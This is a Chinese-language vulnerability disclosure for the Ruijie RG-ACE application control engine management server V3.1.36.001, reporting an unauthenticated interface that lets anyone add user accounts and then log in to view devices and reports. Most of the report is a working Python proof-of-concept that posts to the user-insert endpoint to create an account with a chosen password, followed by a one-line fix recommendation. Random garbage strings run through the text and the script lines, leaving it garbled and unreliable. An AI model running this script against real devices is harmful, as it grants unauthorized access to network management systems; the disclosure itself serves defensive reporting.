锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）


测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
, t, g; m$ t" [$ Z4 c0 |7 ~9 t编译时间: 201104291730

6 y3 `3 L( t# R& I
7 v7 d! z7 f+ V9 r漏洞证明：
0 k) C% }( q. g+ I/ O" W( m

: T- k% W# i6 M3 h
4 y5 i$ U7 o, Q% u: E  w

& o6 |  N2 q* p0 K+ `) E
执行脚本
/ ]4 _$ ?+ b! W! v, H#! /usr/bin/env python
& y# z2 W" l4 C' i2 C4 z. f#coding=gbk
( N6 Z# S/ z4 T% g#RG-ACE管理服务器 V3.1.36.001
: t( [. V+ p6 ?# B" ~import urllib2, urllib,cookielib
  a% k& D% ~% o; Curl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
& d4 B. r4 Y% c( i: v("useractionname","addButtonValue"),
1 Z6 Q$ U4 g" ~, @  K6 I("useropermanager","userManager"),
5 P+ {( K: M5 k* @& J! k" Q' q("userName","t"), #######账号自己加
) k! r2 ~" Z7 l) }# v# a("pwd","aaaaaa"),######密码自己加
& b" F! M0 d, u5 A3 X$ U("trueName","ad"),
("email",""),
- U0 @/ c5 \' e2 t5 q4 i("mobilePhone",""),
  d5 y4 ?/ O) {8 ^4 d("officePhone",""),
("addr",""),
( y3 H$ z* H9 z5 y/ [("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
  _7 r: L3 ^+ |$ }0 ]print "Done"
$ Q! s- t: ?" U: O; j1 @
2 `! K* b2 L" d8 V登录，连接设备
3 q% [$ J' C6 r  U0 d+ n0 ~' w


: r! ]$ P  `- a4 @5 L
. _5 C( H4 G" @9 w) J" z
& k8 l0 ^, J8 Y* Y# J默认的管理员admin权限更大点




  W  j6 V" ~- j* j
修复方案：
5 B- Y$ W% Z  {: j: M: g3 G1 H$ t加强对接口的权限验证
- e& Z& r. `/ H" F* D" U$ D
6 i' {* U% ]2 @3 {: z8 l